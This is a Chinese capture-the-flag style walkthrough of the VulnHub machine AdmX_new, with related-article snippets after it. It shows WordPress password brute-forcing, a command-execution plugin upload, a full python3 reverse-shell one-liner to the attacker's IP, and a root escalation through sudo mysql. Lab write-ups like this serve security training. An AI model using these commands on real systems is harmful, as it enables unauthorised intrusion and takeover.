VulnHub靶机-AdmX_new | 红队打靶

VSole2023-05-24 08:48:54

AdmX_new靶场

一、主机发现

通过nmap进行主机发现

nmap -sn 192.168.56.0/24

靶机ip:192.168.56.108

kali的ip:192.168.56.102

二、对靶机进行信息收集

1、对靶机开放的端口,运行服务,操作系统的版本进行探测

nmap -sV -p- -O 192.168.56.108

经历一段时间的等待,发现靶机只开放了80端口,跑的是apache的http服务;操作系统判断是Linux 4.15 - 5.6,或者Linux 5.0 - 5.4

2、对80端口进行一个nmap漏洞库的扫描

nmap --script=vuln -p80 192.168.56.108

扫描结果显示有/wordpress和/wordpress/wp-login.php目录

3、使用浏览器对80端口进行访问

访问的页面为apache的默认页面,没有信息可以利用,进行目录爆破

4、对80端口进行目录爆破,并进一步探测

gobuster dir -u http://192.168.56.108 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

发现了两个目录,tools和wordpress,又再一次出现了wordpress,那么可以猜测这个网站是一个wordpress的cms搭建的,拼接tools访问,没有权限;凭借wordpress访问,发现的页面不像一个cms所拥有的页面,而且访问速度很慢;

打开开发工具,对数据包进行检查

发现数据包对192.168.159.145进行一个访问,访问的内容都是关于wordpress的一些js文件,而192.168.159.145不存在

会不会是之前在编写代码的时候,靶机的ip为192.168.159.145,但是现在靶机的ip改了,使用burp进行替换,将数据包的192.168.159.145换成192.168.56.108,需要将响应头和请求体都替换。

浏览器重新访问80端口的wprdpress目录

对wordpress目录进行目录爆破gobuster dir -u http://192.168.56.108/wordpress -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

发现有admin目录,指向wp-admin,那么拼接wp-admin进行访问

来到后台地址,尝试一下弱口令admin admin

提示密码错误,证明存在admin的用户名

三、获取初始shell


1、已知admin用户名,使用弱密码进行爆破

使用burp的自动批量发送进行爆破

利用返回长度去进行筛选

密码为adam14

登录

2、获取shell

wordpress的管理员后台有三个可以利用的地方:

a、media处的文件上传

b、appearance的theme editor修改外观主题,404模板,写入反弹shell,可以更新即可以利用

c、plugins上传插件(插件的默认位置url/wordpress/wp-admin/plugins/上传的插件名称)

这里先尝试后两个:

(1)、appearance的theme editor修改外观主题的404模板

先判断是否可以写入,尾部写入echo 123;

点击update file

发现不能修改文件,那么尝试第二种

(2)、plugins上传插件

编写一个自定义插件,写入可以执行系统命令的代码,这里需要注意,编写wordpress的自定义代码需要加注释,这些注释必不可少,不然wordpress不会去执行;上传插件得进行压缩

压缩 zip wordpress_plugin.zip wordpress_plugin.php

上传插件

上传成功,点击activate plugin,插件的默认位置url/wordpress/wp-admin/plugins/上传的插件名称

访问这个插件:http://192.168.56.108/wordpress/wp-admin/plugins/wordpress_plugin.php?cmd=id

输出了id

为什么不直接在插件里面写入反弹shell呢?因为不知道有没有可以利用的工具来进行反弹shell,不清楚是否有nc,python,bash等等,那么写入可以执行系统命令的代码,可以去查找是否存在这些工具。

存在nc,python3,bash

方法一、使用python3进行反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

获得了初始shell

方法二、使用蚁剑连接shell

使用蚁剑连接,则插件里面的代码需要改成一句话木马

蚁剑连接

四、提权

1、第一次提权(wpadmin)

当前用户www-date,sudo -l 没有不用root密码就可以执行的文件

查看自动任务 cat /etc/crontab

发现有定时任务,但是这个定时任务的目录下,发现有文件,但是没有权限

ls /home 发现home目录下有一个wpadmin用户

在wordpress目录下有网站的配置文件,wp-config.php

cat wp-config.php, 发现有数据库的密码和用户,那么尝试连接数据库

mysql -u admin -p Wp_Admin#123,发现不能登录,结合前面信息收集,那么一共得到两个密码,使用这两个密码尝试去登录wpadmin用户

当尝试到adam14的时候,进入了wpadmin用户

2、第二次提权(root)

python3 -c 'import pty;pty.spawn("/bin/bash")'

提高交互性

sudo -l 有可以提升权限的文件

输入sudo /usr/bin/mysql -u root -D wordpress -p 进入数据库

使用mysql自带的system命令

system id 发现为root用户

system /bin/bash

提升为root权限

拿到flag

wordpresssocket
本作品采用《CC 协议》,转载必须注明作者和本文链接
cmd=id输出了id为什么不直接在插件里面写入反弹shell呢?因为不知道有没有可以利用的工具来进行反弹shell,不清楚是否有nc,python,bash等等,那么写入可以执行系统命令的代码,可以去查找是否存在这些工具。发现为root用户system /bin/bash提升为root权限拿到flag
nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target. nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target. NetCat,它的实际可运行的名字叫nc,应该早很就被提供,就象另一个没有公开但是标准的Unix工具。
该漏洞是CGI脚本在处理authentication.cgi请求,来读取POST参数中的"password"参数的值时造成的缓冲区溢出。
通过流量审查技术,审查者可以获取通信过程的双方连接信息、双方身份信息以及流量属性,从而进行进一步的利用或者破坏。在社会安全领域,流量审查甚至能够防止恐怖分子的恐怖袭击、追查嫌疑犯的动向,为社会治安带来新的突破口。从社会安定、国家安全方面来看,应该适当发展流量审查技术,同时应该对这种技术实行严格的管控,避免其成为隐患,造成不可估量的损失。
关于远程代码执行的常用Payload大家好,我是 Ansar Uddin,我是来自孟加拉国的网络安全研究员。这是我的第二篇 Bug 赏金文章。今天的话题都是关于 Rce 的利用。攻击者的能力取决于服务器端解释器的限制。在某些情况下,攻击者可能能够从代码注入升级为命令注入。
在完成了这项针对 Linux 中多个受控制用户空间的基础性工作后,Linux 容器开始逐渐成形并最终发展成了现在的模样。开源 Docker 社区致力于改进这类技术,并免费提供给所有用户,使之获益。除了运行容器之外,Docker 技术还具备其他多项功能,包括简化用于构建容器、传输镜像以及控制镜像版本的流程。与此相反,Docker 技术鼓励应用程序各自独立运行其进程,并提供相应工具以实现这一功能。
网络安全研究人员在WordPress的LiteSpeed Cache插件中发现了一个重大漏洞(编号为CVE-2023-40000),该插件拥有超过400万次活动安装,并存在未经身份验证的站点范围存储 XSS(跨站点脚本)的风险。这可能会允许未经授权访问敏感信息或通过单个HTTP请求在受影响的WordPress网站上进行权限升级。该漏洞由Patchstack团队发现,问题已在插件版本5.7.0.1中
WordPress的Bricks主题中的一个关键安全漏洞被发现并有被积极利用趋势,该漏洞被跟踪为CVE-2024-25600(CVSS 评分:9.8),使未经身份验证的攻击者能够实现远程代码执行。它会影响1.9.6之前的所有版本的Bricks。主题开发人员已在2024年2月13日发布的1.9.6.1版本中解决了这个问题,据估计,Bricks目前约有25000个活跃网站。建议使用该插件的用户应用最新
VSole
网络安全专家